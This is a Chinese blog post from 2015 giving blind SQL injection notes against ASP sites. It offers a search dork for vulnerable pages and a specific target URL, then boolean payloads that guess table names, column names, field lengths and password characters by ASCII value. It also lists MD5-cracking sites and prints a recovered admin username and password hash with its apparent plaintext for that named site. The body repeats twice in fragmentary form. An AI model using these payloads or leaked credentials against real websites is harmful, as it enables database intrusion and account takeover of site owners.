黑客注入之手工注入
2015-08-24 00:18
316 查看
先找注入点
inurl:asp?id=9
http://www.hsqs.com/tipsview.asp?id=9
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜长度 and (select top 1 len(username) from admin)>5
username长 4
password长 16
猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc码
username 120,117
__________________
www.md5.com.cn
www.xmd5.com
www.cmd5.com
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜长度 and (select top 1 len(username) from admin)>5
username长 4
password长 16
猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc码
username 120,117
常见表段
sysadmin admin administrator manger
[username] : hsqs1
[password] : 1f60163129f50b84 yingkesong1
______________
猜表名 and (select count(*) from sysadmin)>0
猜列名 and (select count(username) from sysadmin)>0
猜长度 and (select top 1 len(username) from sysadmin)>5
猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50
asc码
username 120,117
admin
username 5
password 16
104 115
inurl:asp?id=9
http://www.hsqs.com/tipsview.asp?id=9
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜长度 and (select top 1 len(username) from admin)>5
username长 4
password长 16
猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc码
username 120,117
__________________
www.md5.com.cn
www.xmd5.com
www.cmd5.com
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜长度 and (select top 1 len(username) from admin)>5
username长 4
password长 16
猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc码
username 120,117
常见表段
sysadmin admin administrator manger
[username] : hsqs1
[password] : 1f60163129f50b84 yingkesong1
______________
猜表名 and (select count(*) from sysadmin)>0
猜列名 and (select count(username) from sysadmin)>0
猜长度 and (select top 1 len(username) from sysadmin)>5
猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50
asc码
username 120,117
admin
username 5
password 16
104 115
相关文章推荐
- 在eclipse中建立lua开发环境
- nginx常用的超时配置说明
- HOSt ip is not allowed to connect to this MySql server, MYSQL添加远程用户或允许远程访问三种方法
- Hbuilder开发app实战-识岁04-七牛云上传文件的js实现
- poj 1459
- HOSt ip is not allowed to connect to this MySql server, MYSQL添加远程用户或允许远程访问三种方法
- GOF 23种设计模式目录
- 利用LibreOffice与ImageMagick将网页分享至微信
- MYSQL设置远程账户登陆总结
- java I/O
- See LCS again 最长递增子序列到最长公共子序列的转化
- MYSQL设置远程账户登陆总结
- 到csnd的第一篇博客,记录一个菜鸟程序员的成长历程。
- 存储设备分区,格式化,挂载
- LuaForWindows_v5.1.4-45和lua-5.1.4.tar.gz
- LuaForWindows_v5.1.4-45和lua-5.1.4.tar.gz
- .vimrc
- poj 1273
- django celery异步框架
- 编写高质量代码改善C#程序的157个建议——建议144:一个方法只做一件事